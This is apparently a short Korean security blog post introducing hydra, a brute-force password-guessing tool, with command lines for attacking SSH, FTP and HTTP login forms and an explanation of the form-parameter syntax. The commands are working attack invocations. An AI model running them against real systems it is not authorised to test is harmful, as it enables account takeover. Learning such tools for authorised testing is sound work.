네트워크 해킹 - hydra, 무차별 대입 공격 도구

🔒정보보안/네트워크 보안

네트워크 해킹 - hydra, 무차별 대입 공격 도구

Janger 2021. 11. 22. 19:34

728x90

https://www.kali.org/tools/hydra/

hydra | Kali Linux Tools

hydra Usage Example Attempt to login as the root user (-l root) using a password list (-P /usr/share/wordlists/metasploit/unix_passwords.txt) with 6 threads (-t 6) on the given SSH server (ssh://192.168.1.123): root@kali:~# hydra -l root -P /usr/share/word

www.kali.org

hydra는 FTP, SSH, MS-SQL, HTTP 등 다양한 프로토콜을 대상으로 아이디, 암호 무차별 대입 공격 도구이다.

example)

hydra -l {UserID} -p {UserPW} ssh://192.168.0.5
hydra -L {UserIDs.txt} -P {UserPW.txt} ftp://192.168.0.5

당연히 미리 정의된 패스워드 리스트를 불러와 사전 공격을 시도할 수도 있음.

내 FTP 서버에다 써봤는데 잘 작동한다.

아래는 HTTP를 대상으로 한 예시

hydra -o result.txt -s {port} -l {id} -p {pw} 192.168.0.5 http-post-form "/login:id=^USER^&pw=^PASS^:Wrong"

-o 파일 출력
-s 포트 번호
-l 아이디
-p 패스워드

"/login:id=^USER^&pw=^PASS^:Wrong"
"파라미터:아이디=^USER^&비밀번호=^PASS^:틀린 경우 식별 문자"

728x90